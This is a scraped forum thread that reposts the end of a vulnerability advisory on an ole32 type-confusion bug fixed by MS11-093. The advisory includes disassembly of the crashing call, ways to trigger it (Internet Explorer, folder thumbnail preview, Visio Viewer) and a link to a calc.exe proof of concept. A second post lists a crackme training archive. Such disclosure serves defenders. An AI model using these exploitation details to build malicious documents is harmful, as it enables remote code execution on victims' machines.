VT_VERSIONED_STREAM (0x49) which is the cause of the type confusion vulnerability leading to a trivial to exploit code execution. From ole32!CoWaitForMultipleHandles: 7756edcc 8b4708 mov eax,dword ptr [edi+8] 7756edcf 8b4010 mov eax,dword ptr [eax+10h] 7756edd2 8b08 mov ecx,dword ptr [eax] 7756edd4 50 push eax 7756edd5 ff5108 call dword ptr [ecx+8] ; code execution The vulnerability has been tested with PPT, XLS and VSD files with the same effects: - remote exploitation via Internet Explorer, for example if there are Office Viewers installed - automatic exploiting of explorer.exe if the thumbnails previewing of the folder is enabled (if I'm not in error Windows XP has it activated by default) immediately with the opening of the folder where is located the modified PPT file - if the preview mode is not enabled it's necessary to view the properties of the file (right mouse button -> Properties) - the exploitation via the opening of the file may be possible only in some cases (Visio Viewer confirmed) The proof-of-concept should be able to execute calc.exe via Internet Explorer and Visio Viewer, the bug is so trivial to exploit that it's even possible to not use heap spray with some additional work. ####################################################################### =========== 3) The Code =========== Proof-of-concept for Visio Viewer exploitable remotely via Internet Explorer: http://aluigi.org/poc/ole32_1.zip ####################################################################### ====== 4) Fix ====== http://technet.microsoft.com/en-us/security/bulletin/ms11-093 ####################################################################### Sursa: http://aluigi.org/adv/ole32_1-adv.txt
  25. Nytro
    [h=1]Binary Auditor Crackmes/Reversemes[/h] [TABLE] [TR] [TH=bgcolor: #FFF5B0, align: left]Item name:[/TH] [TD]Binary Auditor Crackmes/Reversemes [/TD] [TD=width: 125][TABLE=width: 125] [TR] [TD=width: 125] Currently5/5 1 2 3 4 5 [/TD] [/TR] [TR] [TD=align: center]Rating: 5.0 (1 vote)[/TD] [/TR] [/TABLE] [/TD] [/TR] [TR] [TH=bgcolor: #FFF5B0, align: left]Author:[/TH] [TD]Dr. TS and REA [/TD] [/TR] [TR] [TH=bgcolor: #FFF5B0, align: left]Home URL:[/TH] [TD=colspan: 2]http://www.binary-auditing.com[/TD] [/TR] [TR] [TH=bgcolor: #FFF5B0, align: left]Last updated:[/TH] [TD=colspan: 2][/TD] [/TR] [TR] [TH=bgcolor: #FFF5B0, align: left]Version (if appl.):[/TH] [TD=colspan: 2]1.001[/TD] [/TR] [TR] [TH=bgcolor: #FFF5B0, align: left]Direct D/L link:[/TH] [TD=colspan: 2]Locally archived copy[/TD] [/TR] [TR] [TH=bgcolor: #FFF5B0, align: left]Description:[/TH] [TD=colspan: 2]The archive of the now defunct binary-auditor website. As far as I know, this is the most recently uploaded compilation. Included in the archive is the beginner guide.[/TD] [/TR] [TR] [TH=bgcolor: #FFF5B0, align: left]Related URLs:[/TH] [TD=colspan: 2]No related URLs have been submitted for this item yet[/TD] [/TR] [/TABLE] Sursa: Binary Auditor Crackmes/Reversemes - Collaborative RCE Knowledge Library Download: http://www.woodmann.com/collaborative/knowledge/images/Bin_Binary_Auditor_Crackmes_Reversemes_2011-2-1_19.17_Binary_Auditor_Lessons.zip
×
×
  • Create New...